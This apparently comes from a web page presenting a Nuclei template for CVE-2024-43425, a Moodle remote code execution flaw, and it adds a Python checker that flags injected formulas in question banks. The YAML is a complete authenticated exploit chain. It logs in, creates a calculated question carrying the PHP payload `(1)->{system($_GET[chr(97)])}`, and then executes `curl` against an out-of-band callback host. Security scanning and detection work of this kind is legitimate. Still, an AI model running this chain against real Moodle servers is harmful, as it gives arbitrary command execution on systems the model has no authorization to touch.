Moodle - Remote Code Execution
ID: CVE-2024-43425
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,moodile,rce,authenticated
Description
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
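An added defender-side example (not part of the template or of Moodle itself): a hunting check that flags calculated-question answer formulas which fall outside a plain arithmetic grammar, the field the template fills with `(1)->{system($_GET[chr(97)])}`. The function allow-list and the sample question-bank rows are this example's own assumptions, not Moodle's validator.

```python
import re

# Defender-side check: a Moodle calculated-question answer should be plain arithmetic
# over dataset placeholders like {a}. Payloads for CVE-2024-43425 such as
# "(1)->{system($_GET[chr(97)])}" are not. This allow-list is the example's own.
ALLOWED_FUNCS = {"abs", "ceil", "floor", "round", "sqrt", "pow", "exp", "log",
                 "sin", "cos", "tan", "atan2", "pi", "min", "max"}

TOKEN_RE = re.compile(
    r"\s+"                                          # whitespace
    r"|(?P<num>\d+(?:\.\d+)?(?:[eE][+-]?\d+)?)"     # numeric literal
    r"|(?P<var>\{[A-Za-z_][A-Za-z0-9_]*\})"         # dataset placeholder like {a}
    r"|(?P<func>[A-Za-z_][A-Za-z0-9_]*)(?=\s*\()"   # name of a function call
    r"|(?P<op>[-+*/%^,()])"                         # operators, comma, parens
)

def check_formula(formula: str) -> list:
    """Return the problems found in a formula; an empty list means it looks safe."""
    problems, pos, depth = [], 0, 0
    while pos < len(formula):
        m = TOKEN_RE.match(formula, pos)
        if not m:
            # First character the grammar does not allow ($, ->, [, quotes, ...).
            problems.append(f"unexpected input at offset {pos}: {formula[pos:pos + 12]!r}")
            return problems
        if m.lastgroup == "func" and m.group("func").lower() not in ALLOWED_FUNCS:
            problems.append(f"function not in allow-list: {m.group('func')}")
        elif m.lastgroup == "op" and m.group("op") in "()":
            depth += 1 if m.group("op") == "(" else -1
            if depth < 0:
                problems.append("unbalanced closing parenthesis")
                return problems
        pos = m.end()
    if depth != 0:
        problems.append("unbalanced parentheses")
    return problems

def find_suspicious_answers(rows):
    """rows: (question_id, answer_formula) pairs, e.g. from a question bank export."""
    return [(qid, p) for qid, f in rows if (p := check_formula(f))]

SAMPLE_ROWS = [  # constructed sample rows, not data from a real Moodle instance
    (101, "{a} * {b} / 2"),
    (102, "round(sqrt({a}^2 + {b}^2), 2)"),
    (103, "(1)->{system($_GET[chr(97)])}"),  # payload shape used by the template
    (104, "{a} + 'x'"),
]
```

Run `find_suspicious_answers` over the answer column of a question-bank export; rows 103 and 104 of the constructed sample are flagged, with the offset of the first disallowed character.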
YAML Source
id: CVE-2024-43425

info:
  name: Moodle - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
  reference:
    - https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
    - https://blog.redteam-pentesting.de/2024/moodle-rce/
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
  classification:
    cvss-score: 9.8
    cve-id: CVE-2024-43425
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Moodle"
    product: moodle
    vendor: moodle
  tags: cve,cve2024,moodile,rce,authenticated

flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)

http:
  - raw:
      - |
        GET /login/index.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        anchor=&logintoken={{token}}&username={{username}}&password={{password}}

    host-redirects: true
    extractors:
      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - 'name="logintoken" value="([a-zA-Z0-9]+)">'
        internal: true

  - raw:
      - |
        GET /my/courses.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: sesskey
        part: body
        internal: true
        group: 1
        regex:
          - '"sesskey":"([^"]+)"'

  - raw:
      - |
        POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]

    extractors:
      - type: json
        part: body
        name: courseid
        json:
          - ".[].data.courses[0].id"
        internal: true

  - raw:
      - |
        POST /question/bank/editquestion/question.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes

    extractors:
      - type: regex
        part: header
        name: id
        group: 1
        internal: true
        regex:
          - "&id=([0-9]+)&"

  - raw:
      - |
        POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page

    extractors:
      - type: regex
        part: header
        name: rceurl
        group: 1
        internal: true
        regex:
          - "Location: https?://.*?/question/(.*)&returnurl"

  - raw:
      - |
        GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201105b86dfc1a25393cc0ddc654c5c243dae56e9165c61fa574ea7f99aac4b12a022100c27ab7913ee580efb114718edf59b30695c2c143bec660fa351bc1ec6a4e707a:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors. Because the template logs in before creating the question, the {{username}} and {{password}} variables used in the login request must be supplied (for example with nuclei's -var option), and the check only reports a hit when the interactsh callback is received.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-43425.yaml"